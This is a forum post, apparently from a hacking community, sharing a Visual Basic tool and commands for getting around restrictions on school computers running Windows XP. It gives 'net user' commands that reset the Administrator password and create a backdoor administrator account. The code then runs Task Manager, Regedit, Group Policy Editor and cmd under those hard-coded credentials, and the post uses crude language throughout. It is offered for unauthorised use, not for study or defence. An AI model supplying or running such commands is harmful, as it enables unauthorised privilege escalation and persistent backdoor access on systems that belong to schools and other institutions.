School Hacking - Change administrator password

Well, school's have computers, with a lot of restrictions, so I'm here to bypass them. This code is written in visual basics and will own any computer restrictions assuming they're dumb enough to leave one access point open (like most schools).

So this tool will give you details on how to rape the password using the method common method, then you'll have the administrator credentials along with tools like: Task Manager, Group Policy Editor, Regedit, etc.

If you enjoy this, please say thanks. This program was tested on Windows XP latest service pack
If you want to add more commands, you'll need to learn their process name(ex: cmd.exe, taskmgr.exe, regedit.exe, Gpedit.msc) then just run them like the other process.start() methods.

Let me know if you have any suggestions on what I should add. I'm working on adding another bypass method also, just need to test it.

Code:
Code
Imports System.Security
' I am not to be held at fault if you mis-use this.
' This program might get you suspended/in trouble with your school
' If you are smart, you'll figure out how to create a backdoor administrator account
' poc: command.com /k net user backdoor /ADD
' command.com /k net user backdoor ifuckingwin123!@
' ^ sets password to ifuckingwin123!@ after adding backdoor account
' command.com /k net localgroup administrators backdoor /add
' ^ adds your local account to administrator
Public Class Form1
    Dim username As String = "Administrator"
    Dim password As SecureString = ConvertToSecure("ifuckingwin123!@")
    Dim domain As String = Nothing
    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        TextBox1.Enabled = False
        TextBox1.Text = "Click the button above, please."
        'Panel1.Visible = False
    End Sub

    ' Functions
    Function ConvertToSecure(ByVal str As String)
        Dim password As New SecureString
        For Each c As Char In str.ToCharArray
            password.AppendChar(c)
        Next
        Return password
    End Function

    Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
        MessageBox.Show("Manual Rape --->")
        MessageBox.Show("Start -> Run")
        MessageBox.Show("command.com /k net user Administrator ifuckingwin123!@")
        MessageBox.Show("'Command Completed Successfully'")
        MessageBox.Show("Password reset successfully, new administrator password: ifuckingwin123!@")
        TextBox1.Text = "Administrator password reset. You may now use the commands in the buttons beside"
        'Panel1.Visible = True

    End Sub

    Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.Click
        Process.Start("taskmgr.exe", username, password, domain)
    End Sub

    Private Sub Button3_Click(sender As Object, e As EventArgs) Handles Button3.Click
        Process.Start("regedit.exe", username, password, domain)
    End Sub

    Private Sub Button4_Click(sender As Object, e As EventArgs) Handles Button4.Click
        Process.Start("Gpedit.msc", username, password, domain)
    End Sub

    Private Sub Button5_Click(sender As Object, e As EventArgs) Handles Button5.Click
        Process.Start("cmd.exe", username, password, domain)
    End Sub
End Class
No it will not work on Windows 7 x64 it does not have command.com.
